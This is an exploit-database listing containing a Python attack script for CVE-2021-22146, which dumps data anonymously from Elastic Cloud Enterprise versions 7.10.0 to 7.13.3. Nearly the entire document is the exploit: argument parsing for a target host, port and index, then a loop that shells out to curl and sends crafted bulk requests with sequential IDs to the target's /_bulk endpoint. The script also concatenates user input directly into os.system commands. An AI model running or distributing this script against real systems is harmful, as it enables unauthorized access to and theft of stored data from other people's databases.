Share
## https://sploitus.com/exploit?id=PACKETSTORM:163655
# Exploit Title: Elasticsearch ECE 7.13.3 - Anonymous Database Dump  
# Date: 2021-07-21  
# Exploit Author: Joan Martinez @magichk  
# Vendor Homepage: https://www.elastic.co/  
# Software Link: https://www.elastic.co/  
# Version: >= 7.10.0 to <= 7.13.3  
# Tested on: Elastic ECE (Cloud)  
# CVE : CVE-2021-22146  
# Reference: https://discuss.elastic.co/t/elastic-cloud-enterprise-security-update/279180   
  
import os  
import argparse  
import sys  
  
######### Check Arguments  
def checkArgs():  
parser = argparse.ArgumentParser()  
parser = argparse.ArgumentParser(description='Elasticdump 1.0\n')  
parser.add_argument('-s', "--host", action="store",  
dest='host',  
help="Host to attack.")  
parser.add_argument('-p', "--port", action="store",  
dest='port',  
help="Elastic search port by default 9200 or 9201")  
parser.add_argument('-i', "--index", action="store",  
dest='index',  
help="Index to dump (Example: 30)")  
  
  
args = parser.parse_args()  
if (len(sys.argv)==1) or (args.host==False) or (args.port==False) or (args.index==False and arg.dump==False) :  
parser.print_help(sys.stderr)  
sys.exit(1)  
return args  
  
def banner():  
print(" _ _ _ _")  
print(" ___| | __ _ ___| |_(_) ___ __| |_ _ _ __ ___ _ __")  
print(" / _ \ |/ _` / __| __| |/ __/ _` | | | | '_ ` _ \| '_ \ ")  
print("| __/ | (_| \__ \ |_| | (_| (_| | |_| | | | | | | |_) |")  
print(" \___|_|\__,_|___/\__|_|\___\__,_|\__,_|_| |_| |_| .__/")  
print(" |_|")  
  
  
  
def exploit(host,port,index):  
  
if (index != 0):  
final = int(index)  
else:  
final = 1000000000  
  
cont = 0  
while (cont <= final):  
os.system("curl -X POST \""+host+":"+port+"/_bulk\" -H 'Content-Type: application/x-ndjson' --data-binary $'{\x0d\x0a\"index\" : {\x0d\x0a \"_id\" :\""+str(cont)+"\"\x0d\x0a}\x0d\x0a}\x0d\x0a' -k -s")  
cont = cont + 1  
  
if __name__ == "__main__":  
  
banner()  
args = checkArgs()  
if (args.index):  
exploit(args.host,args.port,args.index)  
else:  
exploit(args.host,args.port,0)